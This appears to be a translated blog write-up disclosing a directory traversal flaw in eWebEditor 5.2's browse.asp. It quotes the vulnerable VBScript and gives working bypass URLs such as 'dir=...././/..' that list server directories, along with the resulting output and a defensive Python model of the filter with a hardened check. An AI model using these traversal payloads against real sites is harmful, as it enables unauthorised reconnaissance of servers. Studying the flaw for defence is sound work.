eWebEditor 5.2 vulnerabilities (series)
: St0p
I set up eWebEditor version 5.2 (asp) on my own machine to take a look while resting from work. I did not really expect to find even a small hole; although it is not useful on its own, it can serve as an aid, which is quite nice.
The hole is in ewebeditor/asp/browse.asp
```vbscript
Function GetList()
    Dim s_List, s_Url
    s_List = ""
    Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
    'Response.Write sCurrDir
    'On Error Resume Next
    Set oFSO = Server.CreateObject("Scripting.FileSystemObject")
    Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir)) 'Note the sCurrDir variable; we will use this value later
    If Err.Number > 0 Then
        s_List = ""
        Exit Function
    End If
    If sDir <> "" Then
        If InstrRev(sDir, "/") > 1 Then
            s_Url = Left(sDir, InstrRev(sDir, "/") - 1)
        Else
            s_Url = ""
        End If
        s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
            "<td><img border=0 src='../sysimage/file/parentfolder.gif'></td>" & _
            "<td>..</td>" & _
            "<td> </td>" & _
            "</tr>"
    End If
    'Response.Write sDir&"!"&s_List
    Dim oSubFolder
    For Each oSubFolder In oUploadFolder.SubFolders
        'Response.Write oUploadFolder.SubFolders
        If sDir = "" Then
            s_Url = oSubFolder.Name
        Else
            s_Url = sDir & "/" & oSubFolder.Name
        End If
        s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
            "<td><img border=0 src='../sysimage/file/closedfolder.gif'></td>" & _
            "<td noWrap>" & oSubFolder.Name & "</td>" & _
            "<td> </td>" & _
            "</tr>"
    Next
    'Response.Write s_List
    Set oUploadFiles = oUploadFolder.Files
    For Each oUploadFile In oUploadFiles
        'Response.Write oUploadFile.Name
        sFileName = oUploadFile.Name
        If CheckValidExt(sFileName) = True Then 'This line is a bit annoying: it checks the allowed file extensions, and anything not allowed cannot be listed; otherwise it would list more than just directory names and image files
            If sDir = "" Then
                s_Url = sContentPath & sFileName
            Else
                s_Url = sContentPath & sDir & "/" & sFileName
            End If
            s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' url='" & s_Url & "'>" & _
                "<td>" & FileName2Pic(sFileName) & "</td>" & _
                "<td noWrap>" & sFileName & "</td>" & _
                "<td align=right>" & GetSizeUnit(oUploadFile.size) & "</td>" & _
                "</tr>"
        End If
    Next
    Set oUploadFolder = Nothing
    Set oUploadFiles = Nothing
    'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
    If sDir = "" Then
        s_Url = ""
        's_Url = "/"
    Else
        s_Url = "/" & sDir & ""
        's_Url = "/" & sDir & "/"
    End If
    s_List = s_List & "</table>"
    s_List = HTML2JS(s_List)
    'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
    s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
    GetList = s_List
End Function

'Without the check below it should be possible to list every file in the directory. A bit annoying.. as it is, only directory names and files with allowed extensions get listed
Function CheckValidExt(s_FileName)
    If sAllowExt = "" Then
        CheckValidExt = True
        Exit Function
    End If
    Dim i, aExt, sExt
    sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
    CheckValidExt = False
    aExt = Split(LCase(sAllowExt), "|")
    For i = 0 To UBound(aExt)
        If aExt(i) = sExt Then
            CheckValidExt = True
            Exit Function
        End If
    Next
End Function

'Following the code downward, we find that sCurrDir gets its value from the following
Sub InitParam()
    sType = UCase(Trim(Request.QueryString("type")))
    sStyleName = Trim(Request.QueryString("style"))
    Dim i, aStyleConfig, bValidStyle
    bValidStyle = False
    For i = 1 To Ubound(aStyle)
        aStyleConfig = Split(aStyle(i), "|||")
        If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
            bValidStyle = True
            Exit For
        End If
    Next
    If bValidStyle = False Then
        OutScript("alert('Invalid Style.')")
    End If
    sBaseUrl = aStyleConfig(19)
    'nAllowBrowse = CLng(aStyleConfig(43))
    nAllowBrowse = 1
    If nAllowBrowse <> 1 Then
        OutScript("alert('Do not allow browse!')")
    End If
    sUploadDir = aStyleConfig(3)
    If Left(sUploadDir, 1) <> "/" Then
        Select Case sType
        Case "REMOTE"
            sUploadDir = "../../" & sUploadDir & "Image/"
        Case "FILE"
            sUploadDir = "../../" & sUploadDir & "Other/"
        Case "MEDIA"
            sUploadDir = "../../" & sUploadDir & "Media/"
        Case "FLASH"
            sUploadDir = "../../" & sUploadDir & "Flash/"
        Case Else
            sUploadDir = "../../" & sUploadDir & "Image/"
        End Select
    End If
    'sUploadDir =sUploadDir &"/"
    Select Case sBaseUrl
    Case "0"
        'sContentPath = aStyleConfig(23)
        Select Case sType
        Case "REMOTE"
            sContentPath = "../" & aStyleConfig(3) & "Image/"
        Case "FILE"
            sContentPath = "../" & aStyleConfig(3) & "Other/"
        Case "MEDIA"
            sContentPath = "../" & aStyleConfig(3) & "Media/"
        Case "FLASH"
            sContentPath = "../" & aStyleConfig(3) & "Flash/"
        Case Else
            sContentPath = "../" & aStyleConfig(3) & "Image/"
        End Select
    Case "1"
        sContentPath = RelativePath2RootPath(sUploadDir)
    Case "2"
        sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
    End Select
    Select Case sType
    Case "REMOTE"
        sAllowExt = aStyleConfig(10)
    Case "FILE"
        sAllowExt = aStyleConfig(6)
    Case "MEDIA"
        sAllowExt = aStyleConfig(9)
    Case "FLASH"
        sAllowExt = aStyleConfig(7)
    Case Else
        sAllowExt = aStyleConfig(8)
    End Select
    sCurrDir = sUploadDir 'Note here: this gets the configured path
    sDir = Trim(Request("dir")) 'get the dir variable
    sDir = Replace(sDir, "\", "/") 'filter the dir variable
    sDir = Replace(sDir, "../", "")
    sDir = Replace(sDir, "./", "")
    If sDir <> "" Then
        If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
            sCurrDir = sUploadDir & sDir & "/" 'This is the key point. See? When sUploadDir & sDir exists, sCurrDir becomes the value of sUploadDir & sDir
            'Although sDir is filtered above, we can bypass it completely. St0p gives the concrete usage in the exploitation section below
        Else
            sDir = ""
        End If
    End If
End Sub
```
Hey, look at this: you can see that dir is in fact filtered, but we can construct a special value that bypasses the check, and so obtain the directory structure and see the files whose extensions are allowed in the configuration file..
The method of use is as follows
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/..
In St0p's test the upload directory was the uploadfile directory under the site root, so with the address above you get every directory in the site root.
Hey, if the window that opens is blank, don't be discouraged: view the page source and you will see the names of the directories in the root.
The root contains a guest directory; we can use the following address to get its structure
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/...././/guest
Then we can also use
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=...././/../...././/..
to go up to higher levels; on my virtual test machine this gave three directories: www, logfile, database.
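An added example, not part of the original post or of eWebEditor: it models the three Replace() calls that InitParam applies to dir, shows how the single-pass stripping collapses the dir values used above into plain "../.." traversal, and puts a canonicalise-then-check replacement beside it. UPLOAD_DIR is a constructed base directory; in the real application it comes from aStyleConfig(3).

```python
import posixpath

# Constructed upload root for the demonstration (assumption; the real value comes
# from aStyleConfig(3) in the style configuration, e.g. "../../uploadfile/Image/").
UPLOAD_DIR = "/uploadfile/Image/"


def ewebeditor_filter(s_dir):
    """Model of the three Replace() calls on sDir in InitParam, each applied once, in order.
    str.replace is non-overlapping and left-to-right, like VBScript Replace."""
    s_dir = s_dir.replace("\\", "/")
    s_dir = s_dir.replace("../", "")
    s_dir = s_dir.replace("./", "")
    return s_dir


def browse_target(s_dir):
    """Canonical form of sUploadDir & sDir, the path browse.asp hands to Server.MapPath."""
    return posixpath.normpath(UPLOAD_DIR + ewebeditor_filter(s_dir))


def escapes_root(path):
    """True when a canonical path lies outside the upload root."""
    root = UPLOAD_DIR.rstrip("/")
    return not (path == root or path.startswith(root + "/"))


def hardened_dir(s_dir):
    """Replacement check: canonicalise the joined path, then require it to stay under the
    upload root. Returns the canonical path, or None if the request would leave the root,
    regardless of how the traversal was spelled. Nothing is stripped, so there is no
    second pass for leftovers to reassemble in."""
    candidate = posixpath.normpath(UPLOAD_DIR + s_dir.replace("\\", "/"))
    return None if escapes_root(candidate) else candidate


def filter_is_idempotent(s_dir):
    """Cheap detection for stripping-style sanitisers: if applying the filter a second
    time changes the output, the first pass left traversal material behind."""
    once = ewebeditor_filter(s_dir)
    return ewebeditor_filter(once) == once
```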
```html
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<title>eWebEditor</title>
</head>
<body>
<script language=javascript>
parent.setDirList("<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../..'><td><img border=0 src='../sysimage/file/parentfolder.gif'></td><td>..</td><td> </td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../logfiles'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>logfiles</td><td> </td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../www'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>www</td><td> </td></tr></table>", "/../../..")
</script>
</body>
</html>
```
This hole can only be regarded as an aid during a penetration test: it reveals the directory structure, for example the management directory or the database directory, so you get the directory names, but it cannot list the files, which leaves St0p a bit depressed.. me....
This is the second original article St0p has published on the blog; after several tries, the blog is now open as well..
Note: the site directory traversal used above is replaced wherever it can be found in the front end